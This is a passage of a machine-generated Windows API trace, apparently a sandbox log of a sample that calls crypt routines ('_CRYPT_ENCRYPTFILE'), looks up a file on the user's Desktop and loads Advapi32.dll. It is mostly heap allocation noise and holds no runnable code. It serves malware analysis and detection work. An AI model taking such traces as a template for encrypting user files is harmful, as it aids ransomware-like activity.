lpString2="Fixed.", cchCount2=6) returned 1 [0158.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CIF.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0158.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IF.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0158.886] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0158.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0158.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0158.886] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0158.886] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0158.887] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0158.887] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0158.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0158.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0158.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0158.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0158.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0158.888] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexDCIF.hex", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4adbe4a, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd4adbe4a, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4adbe4a, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="HexDCIF.hex", cAlternateFileName="")) returned 0xa87410 [0158.889] FindClose (in: hFindFile=0xa87410 | out: hFindFile=0xa87410) returned 1 [0158.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0158.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0158.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0158.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0158.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0158.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0158.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0158.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0158.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0158.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0158.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0158.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0158.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0158.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0158.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0158.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0158.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0158.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0158.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0158.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0158.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0158.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0158.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0158.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0158.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0158.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0158.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0158.890] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0158.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0158.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0158.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0158.890] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0158.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0158.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0158.890] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0158.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0158.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0158.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0158.891] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0158.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0158.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0158.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0158.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0158.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0158.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0158.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0158.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0158.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0158.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0158.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0158.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0158.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0158.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0158.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0158.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0158.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0158.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0158.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0158.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0158.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0158.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0158.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0158.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0158.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0158.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0158.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0158.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0158.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0158.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0158.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0158.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0158.892] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0158.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0158.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0158.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0158.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0158.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0158.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0158.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0158.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.893] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0158.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0158.893] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0158.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0158.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0158.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0158.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0158.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0158.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0158.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0158.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0158.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0158.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0158.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0158.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0158.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0158.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0158.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0158.894] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0158.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0158.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0158.894] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0158.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0158.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0158.895] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0158.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0158.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0158.895] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0158.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0158.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0158.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0158.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0158.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0158.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0158.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0158.896] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0158.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0158.897] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0158.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0158.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0158.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0158.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0158.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0158.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 